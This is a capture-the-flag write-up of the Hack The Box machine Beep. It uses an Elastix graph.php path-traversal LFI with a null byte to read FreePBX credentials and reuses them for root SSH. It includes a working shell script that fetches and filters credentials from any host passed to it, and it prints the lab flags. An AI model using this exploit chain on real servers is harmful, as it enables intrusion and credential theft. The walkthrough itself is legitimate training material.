__    _____        _____     _____ _ _____
        |  |  |  _  |   ___|  _  |___|  |  |_|_   _|___
        |  |__|     |  |  _|     |_ -|     | | | | | .'| 
        |_____|__|__|  |___|__|__|___|__|__|_| |_| |__,|
			hola@lacashita.com

 
 

[HTB] Beep

Today we are going to hack the HTB machine called Beep.
  • Enumeration
  • To start, we run nmap to see which ports are open.
    sml@Cassandra:~$ nmap -A -p- 10.10.10.7
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-09 15:17 CEST
    Nmap scan report for 10.10.10.7
    Host is up (0.043s latency).
    Not shown: 65519 closed ports
    PORT      STATE SERVICE    VERSION
    22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
    | ssh-hostkey:
    |   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
    |_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
    25/tcp    open  smtp       Postfix smtpd
    |_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDST
    80/tcp    open  http       Apache httpd 2.2.3
    |_http-server-header: Apache/2.2.3 (CentOS)
    |_http-title: Did not follow redirect to https://10.10.10.7/
    |_https-redirect: ERROR: Script execution failed (use -d to debug)
    110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
    |_pop3-capabilities: AUTH-RESP-CODE USER UIDL EXPIRE(NEVER) IMPLEMENTATION(Cyrus POP
    111/tcp   open  rpcbind    2 (RPC #100000)
    143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
    |_imap-capabilities: IDLE NAMESPACE MULTIAPPEND OK ACL ATOMIC URLAUTHA0001 X-NETSCAPENCES ANNOTATEMORE CHILDREN RENAME CATENATE ID CONDSTORE NO LITERAL+ IMAP4rev1 SORT=
    443/tcp   open  ssl/https?
    |_ssl-date: 2020-05-09T13:21:41+00:00; +1s from scanner time.
    879/tcp   open  status     1 (RPC #100024)
    993/tcp   open  ssl/imap   Cyrus imapd
    |_imap-capabilities: CAPABILITY
    995/tcp   open  pop3       Cyrus pop3d
    3306/tcp  open  mysql      MySQL (unauthorized)
    4190/tcp  open  sieve      Cyrus timsieved 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4 (include
    4445/tcp  open  upnotifyp?
    4559/tcp  open  hylafax    HylaFAX 4.3.10
    5038/tcp  open  asterisk   Asterisk Call Manager 1.1
    10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
    |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
    Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com, localhost; OS: Unix

    Service detection performed. Please report any incorrect results at https://nmap.org
    Nmap done: 1 IP address (1 host up) scanned in 378.53 seconds
    Visiting http://10.10.10.7 (which redirects to https://10.10.10.7/) shows that it is Elastix. We look for an exploit that could be useful.
    sml@Cassandra:~$ searchsploit elastix
    ------------------------------------------- ----------------------------------------
     Exploit Title                             |  Path
                                               | (/usr/share/exploitdb/)
    ------------------------------------------- ----------------------------------------
    Elastix - 'page' Cross-Site Scripting      | exploits/php/webapps/38078.py
    Elastix - Multiple Cross-Site Scripting Vu | exploits/php/webapps/38544.txt
    Elastix 2.0.2 - Multiple Cross-Site Script | exploits/php/webapps/34942.txt
    Elastix 2.2.0 - 'graph.php' Local File Inc | exploits/php/webapps/37637.pl
    Elastix 2.x - Blind SQL Injection          | exploits/php/webapps/36305.txt
    Elastix < 2.5 - PHP Code Injection         | exploits/php/webapps/38091.php
    FreePBX 2.10.0 / Elastix 2.2.0 - Remote Co | exploits/php/webapps/18650.py
    ------------------------------------------- ----------------------------------------
    Shellcodes: No Result
  • Exploitation
  • We will use Elastix 2.2.0 - 'graph.php' Local File Inc; let's see what the exploit does.
    sml@Cassandra:~$ cat /usr/share/exploitdb/exploits/php/webapps/37637.pl
    ---SNIP---
    #LFI Exploit: /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
    ---SNIP---
    So it is an LFI, and we test it by visiting:
    https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
    The trailing %00 is what makes it work: on the old PHP that Elastix 2.2 ships with, the null byte truncates the include path, so the suffix graph.php appends to current_language is discarded (PHP 5.3.4 and later reject paths containing a null byte, so this trick does not work there). Of all the text that comes back, the line we care about is:
    AMPMGRPASS=jEhdIekWmdjE
    This is the Asterisk manager password from FreePBX's amportal.conf. We log in over SSH as root using the password found in the previous step, which works because the administrator reused the manager password as the root password.
    The box's OpenSSH 4.3 only offers SHA-1 Diffie-Hellman key exchange, which current OpenSSH clients disable by default, so the first attempt fails and we re-enable one of the offered methods with -oKexAlgorithms (a client running OpenSSH 8.8 or newer also needs -oHostKeyAlgorithms=+ssh-rsa, because this server can only sign with SHA-1 RSA).
    sml@Cassandra:~$ ssh root@10.10.10.7
    Unable to negotiate with 10.10.10.7 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
    sml@Cassandra:~$ ssh -oKexAlgorithms=+diffie-hellman-gr
    The authenticity of host '10.10.10.7 (10.10.10.7)' can'
    RSA key fingerprint is SHA256:Ip2MswIVDX1AIEPoLiHsMFfdg
    Are you sure you want to continue connecting (yes/no/[f
    Warning: Permanently added '10.10.10.7' (RSA) to the li
    root@10.10.10.7's password:
    Last login: Tue Jul 16 11:45:47 2019

    Welcome to Elastix
    ----------------------------------------------------

    To access your Elastix System, using a separate worksta
    Open the Internet Browser using the following URL:
    http://10.10.10.7

    [root@beep ~]# id
    uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon)el)
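The two exploitation steps above (reading amportal.conf through the graph.php LFI, then reaching the legacy SSH daemon) scripted in POSIX shell, as an added example that is not part of the original write-up. The host, URL path, parameter names and the amportal.conf keys come from the write-up and from FreePBX; the helper names (lfi_url, amportal_creds, pick_kex, legacy_ssh_opts) and the sample config and error text embedded for the offline demo are constructed for this example.

```shell
#!/bin/sh
# Added example, not code from the original write-up. It scripts the two steps
# above: pull FreePBX credentials out of amportal.conf through the graph.php LFI,
# then build the ssh options a modern client needs to reach this OpenSSH 4.3 box.
# Host, path and parameter names come from the write-up; the helper names and the
# sample data below are assumptions made for this example.

# 1. LFI URL for a file given relative to / (e.g. etc/amportal.conf).
#    The trailing %00 is a null byte: on the old PHP that Elastix 2.2 ships with,
#    include() stops reading the path there, so the suffix graph.php appends to
#    current_language is ignored. PHP 5.3.4+ rejects such paths outright.
lfi_url() {
    printf 'https://%s/vtigercrm/graph.php?current_language=../../../../../../../..//%s%%00&module=Accounts&action' "$1" "$2"
}

# 2. Keep only the credential lines of amportal.conf. graph.php wraps the included
#    file in HTML, so filter on the well-known FreePBX keys instead of dumping all.
amportal_creds() {
    grep -E '^(AMPDBUSER|AMPDBPASS|AMPMGRUSER|AMPMGRPASS|ARI_ADMIN_USERNAME|ARI_ADMIN_PASSWORD)=' \
        | tr -d '\r'
}

# Fetch over the LFI (-k: self-signed certificate on 443) and filter.
dump_creds() {
    curl -sk "$(lfi_url "$1" etc/amportal.conf)" | amportal_creds
}

# 3. Turn OpenSSH's "Unable to negotiate ... Their offer: a,b" error into options.
#    Prefer group-exchange (negotiated, larger modulus) over the fixed 1024-bit
#    group1; both are SHA-1 and disabled by default on current clients.
pick_kex() {
    offer=$(printf '%s\n' "$1" | sed -n 's/.*Their offer: //p')
    case ",$offer," in
        *,diffie-hellman-group-exchange-sha1,*) echo diffie-hellman-group-exchange-sha1 ;;
        *,diffie-hellman-group1-sha1,*)         echo diffie-hellman-group1-sha1 ;;
        *) return 1 ;;
    esac
}

# HostKeyAlgorithms=+ssh-rsa is also needed on OpenSSH 8.8+ clients, which no
# longer accept SHA-1 RSA host-key signatures, the only kind OpenSSH 4.3 produces.
legacy_ssh_opts() {
    kex=$(pick_kex "$1") || return 1
    printf '%s' "-oKexAlgorithms=+$kex -oHostKeyAlgorithms=+ssh-rsa"
}

# Constructed sample data (not the real file or the real error) so the helpers
# can be exercised offline.
SAMPLE_CONF='# FreePBX settings (constructed sample)
AMPDBHOST=localhost
AMPDBUSER=asteriskuser
AMPDBPASS=dbpass123
AMPMGRUSER=admin
AMPMGRPASS=mgrpass456
ARI_ADMIN_USERNAME=admin
ARI_ADMIN_PASSWORD=aripass789
'
SAMPLE_ERR='Unable to negotiate with 10.10.10.7 port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1'

case "$1" in
    --demo)
        printf '%s' "$SAMPLE_CONF" | amportal_creds
        legacy_ssh_opts "$SAMPLE_ERR"; echo ;;
    "") ;;   # run without arguments: only define the helpers
    *)
        dump_creds "$1"   # e.g. ./beep.sh 10.10.10.7
        # options for the offer this box is known to make
        echo "ssh $(legacy_ssh_opts "$SAMPLE_ERR") root@$1" ;;
esac
```

Run it with --demo to exercise the helpers on the embedded samples, or with a host to fetch the real amportal.conf over the LFI and print the ssh command line to try next; the credentials it prints should all be checked for reuse, as the manager password was here.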
  • user.txt
  • [root@beep ~]# cd /home
    [root@beep home]# ls
    fanis  spamfilter
    [root@beep home]# cd fanis
    [root@beep fanis]# ls
    user.txt
    [root@beep fanis]# cat user.txt
    aeff3def0c765c2677b94715cffa73ac
  • root.txt
  • [root@beep fanis]# cd /root
    [root@beep ~]# ls
    anaconda-ks.cfg            install.log.syslog  webmin-1
    elastix-pr-2.2-1.i386.rpm  postnochroot
    install.log                root.txt
    [root@beep ~]# cat root.txt
    d88e006123842106982acce0aaf453f0
    [root@beep ~]#
  • End
  • And with that we have both the user flag and the root flag.